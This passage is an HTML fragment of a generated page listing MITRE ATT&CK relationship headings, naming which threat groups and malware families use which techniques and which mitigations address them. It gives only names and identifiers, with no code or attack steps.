<h3 id="_deep_panda_g0009_uses_regsvr32_t1117"><a class="anchor" href="#_deep_panda_g0009_uses_regsvr32_t1117"></a><a class="link" href="#_deep_panda_g0009_uses_regsvr32_t1117">Deep Panda (G0009) uses Regsvr32 (T1117)</a></h3>
</div>
<div class="sect2">
<h3 id="_email_collection_mitigation_t1114_mitigates_email_collection_t1114"><a class="anchor" href="#_email_collection_mitigation_t1114_mitigates_email_collection_t1114"></a><a class="link" href="#_email_collection_mitigation_t1114_mitigates_email_collection_t1114">Email Collection Mitigation (T1114) mitigates Email Collection (T1114)</a></h3>
</div>
<div class="sect2">
<h3 id="_matroyshka_s0167_uses_process_injection_t1055"><a class="anchor" href="#_matroyshka_s0167_uses_process_injection_t1055"></a><a class="link" href="#_matroyshka_s0167_uses_process_injection_t1055">Matroyshka (S0167) uses Process Injection (T1055)</a></h3>
</div>
<div class="sect2">
<h3 id="_rtm_s0148_uses_system_time_discovery_t1124"><a class="anchor" href="#_rtm_s0148_uses_system_time_discovery_t1124"></a><a class="link" href="#_rtm_s0148_uses_system_time_discovery_t1124">RTM (S0148) uses System Time Discovery (T1124)</a></h3>
</div>
<div class="sect2">
<h3 id="_powerduke_s0139_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_powerduke_s0139_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_powerduke_s0139_uses_system_network_configuration_discovery_t1016">PowerDuke (S0139) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_janicab_s0163_uses_screen_capture_t1113"><a class="anchor" href="#_janicab_s0163_uses_screen_capture_t1113"></a><a class="link" href="#_janicab_s0163_uses_screen_capture_t1113">Janicab (S0163) uses Screen Capture (T1113)</a></h3>
</div>
<div class="sect2">
<h3 id="_hooking_mitigation_t1179_mitigates_hooking_t1179"><a class="anchor" href="#_hooking_mitigation_t1179_mitigates_hooking_t1179"></a><a class="link" href="#_hooking_mitigation_t1179_mitigates_hooking_t1179">Hooking Mitigation (T1179) mitigates Hooking (T1179)</a></h3>
</div>
<div class="sect2">
<h3 id="_deep_panda_g0009_uses_streamex_s0142"><a class="anchor" href="#_deep_panda_g0009_uses_streamex_s0142"></a><a class="link" href="#_deep_panda_g0009_uses_streamex_s0142">Deep Panda (G0009) uses StreamEx (S0142)</a></h3>
</div>
<div class="sect2">
<h3 id="_cosmicduke_s0050_uses_scheduled_task_t1053"><a class="anchor" href="#_cosmicduke_s0050_uses_scheduled_task_t1053"></a><a class="link" href="#_cosmicduke_s0050_uses_scheduled_task_t1053">CosmicDuke (S0050) uses Scheduled Task (T1053)</a></h3>
</div>
<div class="sect2">
<h3 id="_h1n1_s0132_uses_file_deletion_t1107"><a class="anchor" href="#_h1n1_s0132_uses_file_deletion_t1107"></a><a class="link" href="#_h1n1_s0132_uses_file_deletion_t1107">H1N1 (S0132) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_jhuhugit_s0044_uses_exploitation_of_vulnerability_t1068"><a class="anchor" href="#_jhuhugit_s0044_uses_exploitation_of_vulnerability_t1068"></a><a class="link" href="#_jhuhugit_s0044_uses_exploitation_of_vulnerability_t1068">JHUHUGIT (S0044) uses Exploitation of Vulnerability (T1068)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027_uses_china_chopper_s0020"><a class="anchor" href="#_threat_group_3390_g0027_uses_china_chopper_s0020"></a><a class="link" href="#_threat_group_3390_g0027_uses_china_chopper_s0020">Threat Group-3390 (G0027) uses China Chopper (S0020)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_lazarus_group_g0032_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_lazarus_group_g0032_uses_file_and_directory_discovery_t1083">Lazarus Group (G0032) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_turla_g0010_uses_arp_s0099"><a class="anchor" href="#_turla_g0010_uses_arp_s0099"></a><a class="link" href="#_turla_g0010_uses_arp_s0099">Turla (G0010) uses Arp (S0099)</a></h3>
</div>
<div class="sect2">
<h3 id="_regsvr32_mitigation_t1117_mitigates_regsvr32_t1117"><a class="anchor" href="#_regsvr32_mitigation_t1117_mitigates_regsvr32_t1117"></a><a class="link" href="#_regsvr32_mitigation_t1117_mitigates_regsvr32_t1117">Regsvr32 Mitigation (T1117) mitigates Regsvr32 (T1117)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_chopstick_s0023"><a class="anchor" href="#_apt28_g0007_uses_chopstick_s0023"></a><a class="link" href="#_apt28_g0007_uses_chopstick_s0023">APT28 (G0007) uses CHOPSTICK (S0023)</a></h3>
</div>
<div class="sect2">
<h3 id="_image_file_execution_options_injection_mitigation_t1183_mitigates_image_file_execution_options_injection_t1183"><a class="anchor" href="#_image_file_execution_options_injection_mitigation_t1183_mitigates_image_file_execution_options_injection_t1183"></a><a class="link" href="#_image_file_execution_options_injection_mitigation_t1183_mitigates_image_file_execution_options_injection_t1183">Image File Execution Options Injection Mitigation (T1183) mitigates Image File Execution Options Injection (T1183)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt18_g0026_uses_httpbrowser_s0070"><a class="anchor" href="#_apt18_g0026_uses_httpbrowser_s0070"></a><a class="link" href="#_apt18_g0026_uses_httpbrowser_s0070">APT18 (G0026) uses HTTPBrowser (S0070)</a></h3>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154_uses_screen_capture_t1113"><a class="anchor" href="#_cobalt_strike_s0154_uses_screen_capture_t1113"></a><a class="link" href="#_cobalt_strike_s0154_uses_screen_capture_t1113">Cobalt Strike (S0154) uses Screen Capture (T1113)</a></h3>
</div>
<div class="sect2">
<h3 id="_netsh_s0108_uses_netsh_helper_dll_t1128"><a class="anchor" href="#_netsh_s0108_uses_netsh_helper_dll_t1128"></a><a class="link" href="#_netsh_s0108_uses_netsh_helper_dll_t1128">netsh (S0108) uses Netsh Helper DLL (T1128)</a></h3>
</div>
<div class="sect2">
<h3 id="_screen_capture_mitigation_t1113_mitigates_screen_capture_t1113"><a class="anchor" href="#_screen_capture_mitigation_t1113_mitigates_screen_capture_t1113"></a><a class="link" href="#_screen_capture_mitigation_t1113_mitigates_screen_capture_t1113">Screen Capture Mitigation (T1113) mitigates Screen Capture (T1113)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_accessibility_features_t1015"><a class="anchor" href="#_apt3_g0022_uses_accessibility_features_t1015"></a><a class="link" href="#_apt3_g0022_uses_accessibility_features_t1015">APT3 (G0022) uses Accessibility Features (T1015)</a></h3>
</div>
<div class="sect2">
<h3 id="_seaduke_s0053_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_seaduke_s0053_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_seaduke_s0053_uses_registry_run_keys_start_folder_t1060">SeaDuke (S0053) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154_uses_exploitation_of_vulnerability_t1068"><a class="anchor" href="#_cobalt_strike_s0154_uses_exploitation_of_vulnerability_t1068"></a><a class="link" href="#_cobalt_strike_s0154_uses_exploitation_of_vulnerability_t1068">Cobalt Strike (S0154) uses Exploitation of Vulnerability (T1068)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027_uses_external_remote_services_t1133"><a class="anchor" href="#_threat_group_3390_g0027_uses_external_remote_services_t1133"></a><a class="link" href="#_threat_group_3390_g0027_uses_external_remote_services_t1133">Threat Group-3390 (G0027) uses External Remote Services (T1133)</a></h3>
</div>
<div class="sect2">
<h3 id="_rover_s0090_uses_automated_exfiltration_t1020"><a class="anchor" href="#_rover_s0090_uses_automated_exfiltration_t1020"></a><a class="link" href="#_rover_s0090_uses_automated_exfiltration_t1020">Rover (S0090) uses Automated Exfiltration (T1020)</a></h3>
</div>
<div class="sect2">
<h3 id="_tinytyphon_s0131_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_tinytyphon_s0131_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_tinytyphon_s0131_uses_file_and_directory_discovery_t1083">TINYTYPHON (S0131) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_httpclient_s0068_uses_custom_cryptographic_protocol_t1024"><a class="anchor" href="#_httpclient_s0068_uses_custom_cryptographic_protocol_t1024"></a><a class="link" href="#_httpclient_s0068_uses_custom_cryptographic_protocol_t1024">httpclient (S0068) uses Custom Cryptographic Protocol (T1024)</a></h3>
</div>
<div class="sect2">
<h3 id="_patchwork_g0040_uses_bypass_user_account_control_t1088"><a class="anchor" href="#_patchwork_g0040_uses_bypass_user_account_control_t1088"></a><a class="link" href="#_patchwork_g0040_uses_bypass_user_account_control_t1088">Patchwork (G0040) uses Bypass User Account Control (T1088)</a></h3>
</div>
<div class="sect2">
<h3 id="_neteagle_s0034_uses_fallback_channels_t1008"><a class="anchor" href="#_neteagle_s0034_uses_fallback_channels_t1008"></a><a class="link" href="#_neteagle_s0034_uses_fallback_channels_t1008">NETEAGLE (S0034) uses Fallback Channels (T1008)</a></h3>
</div>
<div class="sect2">
<h3 id="_patchwork_g0040_uses_credential_dumping_t1003"><a class="anchor" href="#_patchwork_g0040_uses_credential_dumping_t1003"></a><a class="link" href="#_patchwork_g0040_uses_credential_dumping_t1003">Patchwork (G0040) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_elmer_s0064_uses_commonly_used_port_t1043"><a class="anchor" href="#_elmer_s0064_uses_commonly_used_port_t1043"></a><a class="link" href="#_elmer_s0064_uses_commonly_used_port_t1043">ELMER (S0064) uses Commonly Used Port (T1043)</a></h3>
</div>
<div class="sect2">
<h3 id="_binary_padding_mitigation_t1009_mitigates_binary_padding_t1009"><a class="anchor" href="#_binary_padding_mitigation_t1009_mitigates_binary_padding_t1009"></a><a class="link" href="#_binary_padding_mitigation_t1009_mitigates_binary_padding_t1009">Binary Padding Mitigation (T1009) mitigates Binary Padding (T1009)</a></h3>
</div>
<div class="sect2">
<h3 id="_menupass_g0045_uses_ping_s0097"><a class="anchor" href="#_menupass_g0045_uses_ping_s0097"></a><a class="link" href="#_menupass_g0045_uses_ping_s0097">menuPass (G0045) uses Ping (S0097)</a></h3>
</div>
<div class="sect2">
<h3 id="_sykipot_s0018_uses_account_discovery_t1087"><a class="anchor" href="#_sykipot_s0018_uses_account_discovery_t1087"></a><a class="link" href="#_sykipot_s0018_uses_account_discovery_t1087">Sykipot (S0018) uses Account Discovery (T1087)</a></h3>
</div>
<div class="sect2">
<h3 id="_hammertoss_s0037_uses_web_service_t1102"><a class="anchor" href="#_hammertoss_s0037_uses_web_service_t1102"></a><a class="link" href="#_hammertoss_s0037_uses_web_service_t1102">HAMMERTOSS (S0037) uses Web Service (T1102)</a></h3>
</div>
<div class="sect2">
<h3 id="_misdat_s0083_uses_command_line_interface_t1059"><a class="anchor" href="#_misdat_s0083_uses_command_line_interface_t1059"></a><a class="link" href="#_misdat_s0083_uses_command_line_interface_t1059">Misdat (S0083) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_bbsrat_s0127_uses_process_discovery_t1057"><a class="anchor" href="#_bbsrat_s0127_uses_process_discovery_t1057"></a><a class="link" href="#_bbsrat_s0127_uses_process_discovery_t1057">BBSRAT (S0127) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_suckfly_g0039_uses_credential_dumping_t1003"><a class="anchor" href="#_suckfly_g0039_uses_credential_dumping_t1003"></a><a class="link" href="#_suckfly_g0039_uses_credential_dumping_t1003">Suckfly (G0039) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_httpbrowser_s0070_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_httpbrowser_s0070_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_httpbrowser_s0070_uses_registry_run_keys_start_folder_t1060">HTTPBrowser (S0070) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_oilrig_g0049_uses_netstat_s0104"><a class="anchor" href="#_oilrig_g0049_uses_netstat_s0104"></a><a class="link" href="#_oilrig_g0049_uses_netstat_s0104">OilRig (G0049) uses netstat (S0104)</a></h3>
</div>
<div class="sect2">
<h3 id="_truvasys_s0178_uses_masquerading_t1036"><a class="anchor" href="#_truvasys_s0178_uses_masquerading_t1036"></a><a class="link" href="#_truvasys_s0178_uses_masquerading_t1036">Truvasys (S0178) uses Masquerading (T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_redleaves_s0153_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_redleaves_s0153_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_redleaves_s0153_uses_system_network_configuration_discovery_t1016">RedLeaves (S0153) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_turla_g0010_uses_brute_force_t1110"><a class="anchor" href="#_turla_g0010_uses_brute_force_t1110"></a><a class="link" href="#_turla_g0010_uses_brute_force_t1110">Turla (G0010) uses Brute Force (T1110)</a></h3>
</div>
<div class="sect2">
<h3 id="_bronze_butler_g0060_uses_command_line_interface_t1059"><a class="anchor" href="#_bronze_butler_g0060_uses_command_line_interface_t1059"></a><a class="link" href="#_bronze_butler_g0060_uses_command_line_interface_t1059">BRONZE BUTLER (G0060) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_copykittens_g0052_uses_rundll32_t1085"><a class="anchor" href="#_copykittens_g0052_uses_rundll32_t1085"></a><a class="link" href="#_copykittens_g0052_uses_rundll32_t1085">CopyKittens (G0052) uses Rundll32 (T1085)</a></h3>
</div>
<div class="sect2">
<h3 id="_naikon_g0019_uses_tasklist_s0057"><a class="anchor" href="#_naikon_g0019_uses_tasklist_s0057"></a><a class="link" href="#_naikon_g0019_uses_tasklist_s0057">Naikon (G0019) uses Tasklist (S0057)</a></h3>
</div>
<div class="sect2">
<h3 id="_powerduke_s0139_uses_process_discovery_t1057"><a class="anchor" href="#_powerduke_s0139_uses_process_discovery_t1057"></a><a class="link" href="#_powerduke_s0139_uses_process_discovery_t1057">PowerDuke (S0139) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_xagentosx_s0161_uses_input_capture_t1056"><a class="anchor" href="#_xagentosx_s0161_uses_input_capture_t1056"></a><a class="link" href="#_xagentosx_s0161_uses_input_capture_t1056">XAgentOSX (S0161) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_sslmm_s0058_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_sslmm_s0058_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_sslmm_s0058_uses_registry_run_keys_start_folder_t1060">SslMM (S0058) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_windows_remote_management_mitigation_t1028_mitigates_windows_remote_management_t1028"><a class="anchor" href="#_windows_remote_management_mitigation_t1028_mitigates_windows_remote_management_t1028"></a><a class="link" href="#_windows_remote_management_mitigation_t1028_mitigates_windows_remote_management_t1028">Windows Remote Management Mitigation (T1028) mitigates Windows Remote Management (T1028)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin5_g0053_uses_remote_system_discovery_t1018"><a class="anchor" href="#_fin5_g0053_uses_remote_system_discovery_t1018"></a><a class="link" href="#_fin5_g0053_uses_remote_system_discovery_t1018">FIN5 (G0053) uses Remote System Discovery (T1018)</a></h3>
</div>
<div class="sect2">
<h3 id="_system_firmware_mitigation_t1019_mitigates_system_firmware_t1019"><a class="anchor" href="#_system_firmware_mitigation_t1019_mitigates_system_firmware_t1019"></a><a class="link" href="#_system_firmware_mitigation_t1019_mitigates_system_firmware_t1019">System Firmware Mitigation (T1019) mitigates System Firmware (T1019)</a></h3>
</div>
<div class="sect2">
<h3 id="_powersource_s0145_uses_remote_file_copy_t1105"><a class="anchor" href="#_powersource_s0145_uses_remote_file_copy_t1105"></a><a class="link" href="#_powersource_s0145_uses_remote_file_copy_t1105">POWERSOURCE (S0145) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_remsec_s0125_uses_process_injection_t1055"><a class="anchor" href="#_remsec_s0125_uses_process_injection_t1055"></a><a class="link" href="#_remsec_s0125_uses_process_injection_t1055">Remsec (S0125) uses Process Injection (T1055)</a></h3>
</div>
<div class="sect2">
<h3 id="_moonwind_s0149_uses_process_discovery_t1057"><a class="anchor" href="#_moonwind_s0149_uses_process_discovery_t1057"></a><a class="link" href="#_moonwind_s0149_uses_process_discovery_t1057">MoonWind (S0149) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_cosmicduke_s0050_uses_exfiltration_over_alternative_protocol_t1048"><a class="anchor" href="#_cosmicduke_s0050_uses_exfiltration_over_alternative_protocol_t1048"></a><a class="link" href="#_cosmicduke_s0050_uses_exfiltration_over_alternative_protocol_t1048">CosmicDuke (S0050) uses Exfiltration Over Alternative Protocol (T1048)</a></h3>
</div>
<div class="sect2">
<h3 id="_owaauth_s0072_uses_timestomp_t1099"><a class="anchor" href="#_owaauth_s0072_uses_timestomp_t1099"></a><a class="link" href="#_owaauth_s0072_uses_timestomp_t1099">OwaAuth (S0072) uses Timestomp (T1099)</a></h3>
</div>
<div class="sect2">
<h3 id="_ke3chang_g0004_uses_credential_dumping_t1003"><a class="anchor" href="#_ke3chang_g0004_uses_credential_dumping_t1003"></a><a class="link" href="#_ke3chang_g0004_uses_credential_dumping_t1003">Ke3chang (G0004) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_launchctl_mitigation_t1152_mitigates_launchctl_t1152"><a class="anchor" href="#_launchctl_mitigation_t1152_mitigates_launchctl_t1152"></a><a class="link" href="#_launchctl_mitigation_t1152_mitigates_launchctl_t1152">Launchctl Mitigation (T1152) mitigates Launchctl (T1152)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt34_g0057_uses_reg_s0075"><a class="anchor" href="#_apt34_g0057_uses_reg_s0075"></a><a class="link" href="#_apt34_g0057_uses_reg_s0075">APT34 (G0057) uses Reg (S0075)</a></h3>
</div>
<div class="sect2">
<h3 id="_backdoor_oldrea_s0093_uses_email_collection_t1114"><a class="anchor" href="#_backdoor_oldrea_s0093_uses_email_collection_t1114"></a><a class="link" href="#_backdoor_oldrea_s0093_uses_email_collection_t1114">Backdoor.Oldrea (S0093) uses Email Collection (T1114)</a></h3>
</div>
<div class="sect2">
<h3 id="_automated_exfiltration_mitigation_t1020_mitigates_automated_exfiltration_t1020"><a class="anchor" href="#_automated_exfiltration_mitigation_t1020_mitigates_automated_exfiltration_t1020"></a><a class="link" href="#_automated_exfiltration_mitigation_t1020_mitigates_automated_exfiltration_t1020">Automated Exfiltration Mitigation (T1020) mitigates Automated Exfiltration (T1020)</a></h3>
</div>
<div class="sect2">
<h3 id="_biscuit_s0017_uses_fallback_channels_t1008"><a class="anchor" href="#_biscuit_s0017_uses_fallback_channels_t1008"></a><a class="link" href="#_biscuit_s0017_uses_fallback_channels_t1008">BISCUIT (S0017) uses Fallback Channels (T1008)</a></h3>
</div>
<div class="sect2">
<h3 id="_zlib_s0086_uses_system_service_discovery_t1007"><a class="anchor" href="#_zlib_s0086_uses_system_service_discovery_t1007"></a><a class="link" href="#_zlib_s0086_uses_system_service_discovery_t1007">ZLib (S0086) uses System Service Discovery (T1007)</a></h3>
</div>
<div class="sect2">
<h3 id="_elise_s0081_uses_process_injection_t1055"><a class="anchor" href="#_elise_s0081_uses_process_injection_t1055"></a><a class="link" href="#_elise_s0081_uses_process_injection_t1055">Elise (S0081) uses Process Injection (T1055)</a></h3>
</div>
<div class="sect2">
<h3 id="_httpbrowser_s0070_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_httpbrowser_s0070_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_httpbrowser_s0070_uses_standard_application_layer_protocol_t1071">HTTPBrowser (S0070) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_prikormka_s0113_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_prikormka_s0113_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_prikormka_s0113_uses_registry_run_keys_start_folder_t1060">Prikormka (S0113) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_bubblewrap_s0043_uses_standard_non_application_layer_protocol_t1095"><a class="anchor" href="#_bubblewrap_s0043_uses_standard_non_application_layer_protocol_t1095"></a><a class="link" href="#_bubblewrap_s0043_uses_standard_non_application_layer_protocol_t1095">BUBBLEWRAP (S0043) uses Standard Non-Application Layer Protocol (T1095)</a></h3>
</div>
<div class="sect2">
<h3 id="_rarstone_s0055_uses_process_injection_t1055"><a class="anchor" href="#_rarstone_s0055_uses_process_injection_t1055"></a><a class="link" href="#_rarstone_s0055_uses_process_injection_t1055">RARSTONE (S0055) uses Process Injection (T1055)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_credential_dumping_t1003"><a class="anchor" href="#_apt1_g0006_uses_credential_dumping_t1003"></a><a class="link" href="#_apt1_g0006_uses_credential_dumping_t1003">APT1 (G0006) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_bubblewrap_s0043_uses_system_information_discovery_t1082"><a class="anchor" href="#_bubblewrap_s0043_uses_system_information_discovery_t1082"></a><a class="link" href="#_bubblewrap_s0043_uses_system_information_discovery_t1082">BUBBLEWRAP (S0043) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_dustysky_s0062_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_dustysky_s0062_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_dustysky_s0062_uses_obfuscated_files_or_information_t1027">DustySky (S0062) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt32_g0050_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_apt32_g0050_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_apt32_g0050_uses_obfuscated_files_or_information_t1027">APT32 (G0050) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_pisloader_s0124_uses_remote_file_copy_t1105"><a class="anchor" href="#_pisloader_s0124_uses_remote_file_copy_t1105"></a><a class="link" href="#_pisloader_s0124_uses_remote_file_copy_t1105">Pisloader (S0124) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_shamoon_s0140_uses_masquerading_t1036"><a class="anchor" href="#_shamoon_s0140_uses_masquerading_t1036"></a><a class="link" href="#_shamoon_s0140_uses_masquerading_t1036">Shamoon (S0140) uses Masquerading (T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_credential_dumping_mitigation_t1003_mitigates_credential_dumping_t1003"><a class="anchor" href="#_credential_dumping_mitigation_t1003_mitigates_credential_dumping_t1003"></a><a class="link" href="#_credential_dumping_mitigation_t1003_mitigates_credential_dumping_t1003">Credential Dumping Mitigation (T1003) mitigates Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_volgmer_s0180_uses_remote_file_copy_t1105"><a class="anchor" href="#_volgmer_s0180_uses_remote_file_copy_t1105"></a><a class="link" href="#_volgmer_s0180_uses_remote_file_copy_t1105">Volgmer (S0180) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_powerduke_s0139_uses_system_owner_user_discovery_t1033"><a class="anchor" href="#_powerduke_s0139_uses_system_owner_user_discovery_t1033"></a><a class="link" href="#_powerduke_s0139_uses_system_owner_user_discovery_t1033">PowerDuke (S0139) uses System Owner/User Discovery (T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_deep_panda_g0009_uses_web_shell_t1100"><a class="anchor" href="#_deep_panda_g0009_uses_web_shell_t1100"></a><a class="link" href="#_deep_panda_g0009_uses_web_shell_t1100">Deep Panda (G0009) uses Web Shell (T1100)</a></h3>
</div>
<div class="sect2">
<h3 id="_mivast_s0080_uses_remote_file_copy_t1105"><a class="anchor" href="#_mivast_s0080_uses_remote_file_copy_t1105"></a><a class="link" href="#_mivast_s0080_uses_remote_file_copy_t1105">Mivast (S0080) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_osinfo_s0165_uses_query_registry_t1012"><a class="anchor" href="#_osinfo_s0165_uses_query_registry_t1012"></a><a class="link" href="#_osinfo_s0165_uses_query_registry_t1012">OSInfo (S0165) uses Query Registry (T1012)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_exploitation_of_vulnerability_t1068"><a class="anchor" href="#_apt28_g0007_uses_exploitation_of_vulnerability_t1068"></a><a class="link" href="#_apt28_g0007_uses_exploitation_of_vulnerability_t1068">APT28 (G0007) uses Exploitation of Vulnerability (T1068)</a></h3>
</div>
<div class="sect2">
<h3 id="_hi_zor_s0087_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_hi_zor_s0087_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_hi_zor_s0087_uses_standard_application_layer_protocol_t1071">Hi-Zor (S0087) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_multi_hop_proxy_mitigation_t1188_mitigates_multi_hop_proxy_t1188"><a class="anchor" href="#_multi_hop_proxy_mitigation_t1188_mitigates_multi_hop_proxy_t1188"></a><a class="link" href="#_multi_hop_proxy_mitigation_t1188_mitigates_multi_hop_proxy_t1188">Multi-hop Proxy Mitigation (T1188) mitigates Multi-hop Proxy (T1188)</a></h3>
</div>
<div class="sect2">
<h3 id="_duqu_s0038_uses_scheduled_task_t1053"><a class="anchor" href="#_duqu_s0038_uses_scheduled_task_t1053"></a><a class="link" href="#_duqu_s0038_uses_scheduled_task_t1053">Duqu (S0038) uses Scheduled Task (T1053)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_brute_force_t1110"><a class="anchor" href="#_apt3_g0022_uses_brute_force_t1110"></a><a class="link" href="#_apt3_g0022_uses_brute_force_t1110">APT3 (G0022) uses Brute Force (T1110)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin6_g0037_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_fin6_g0037_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_fin6_g0037_uses_registry_run_keys_start_folder_t1060">FIN6 (G0037) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_usbstealer_s0136_uses_automated_collection_t1119"><a class="anchor" href="#_usbstealer_s0136_uses_automated_collection_t1119"></a><a class="link" href="#_usbstealer_s0136_uses_automated_collection_t1119">USBStealer (S0136) uses Automated Collection (T1119)</a></h3>
</div>
<div class="sect2">
<h3 id="_hidden_users_mitigation_t1147_mitigates_hidden_users_t1147"><a class="anchor" href="#_hidden_users_mitigation_t1147_mitigates_hidden_users_t1147"></a><a class="link" href="#_hidden_users_mitigation_t1147_mitigates_hidden_users_t1147">Hidden Users Mitigation (T1147) mitigates Hidden Users (T1147)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027_uses_data_compressed_t1002"><a class="anchor" href="#_threat_group_3390_g0027_uses_data_compressed_t1002"></a><a class="link" href="#_threat_group_3390_g0027_uses_data_compressed_t1002">Threat Group-3390 (G0027) uses Data Compressed (T1002)</a></h3>
</div>
<div class="sect2">
<h3 id="_trojan_karagany_s0094_uses_screen_capture_t1113"><a class="anchor" href="#_trojan_karagany_s0094_uses_screen_capture_t1113"></a><a class="link" href="#_trojan_karagany_s0094_uses_screen_capture_t1113">Trojan.Karagany (S0094) uses Screen Capture (T1113)</a></h3>
</div>
<div class="sect2">
<h3 id="_uroburos_s0022_uses_software_packing_t1045"><a class="anchor" href="#_uroburos_s0022_uses_software_packing_t1045"></a><a class="link" href="#_uroburos_s0022_uses_software_packing_t1045">Uroburos (S0022) uses Software Packing (T1045)</a></h3>
</div>
<div class="sect2">
<h3 id="_reaver_s0172_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_reaver_s0172_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_reaver_s0172_uses_system_network_configuration_discovery_t1016">Reaver (S0172) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin10_g0051_uses_file_deletion_t1107"><a class="anchor" href="#_fin10_g0051_uses_file_deletion_t1107"></a><a class="link" href="#_fin10_g0051_uses_file_deletion_t1107">FIN10 (G0051) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_streamex_s0142_uses_new_service_t1050"><a class="anchor" href="#_streamex_s0142_uses_new_service_t1050"></a><a class="link" href="#_streamex_s0142_uses_new_service_t1050">StreamEx (S0142) uses New Service (T1050)</a></h3>
</div>
<div class="sect2">
<h3 id="_plugx_s0013_uses_execution_through_api_t1106"><a class="anchor" href="#_plugx_s0013_uses_execution_through_api_t1106"></a><a class="link" href="#_plugx_s0013_uses_execution_through_api_t1106">PlugX (S0013) uses Execution through API (T1106)</a></h3>
</div>
<div class="sect2">
<h3 id="_autoit_backdoor_s0129_uses_bypass_user_account_control_t1088"><a class="anchor" href="#_autoit_backdoor_s0129_uses_bypass_user_account_control_t1088"></a><a class="link" href="#_autoit_backdoor_s0129_uses_bypass_user_account_control_t1088">AutoIt backdoor (S0129) uses Bypass User Account Control (T1088)</a></h3>
</div>
<div class="sect2">
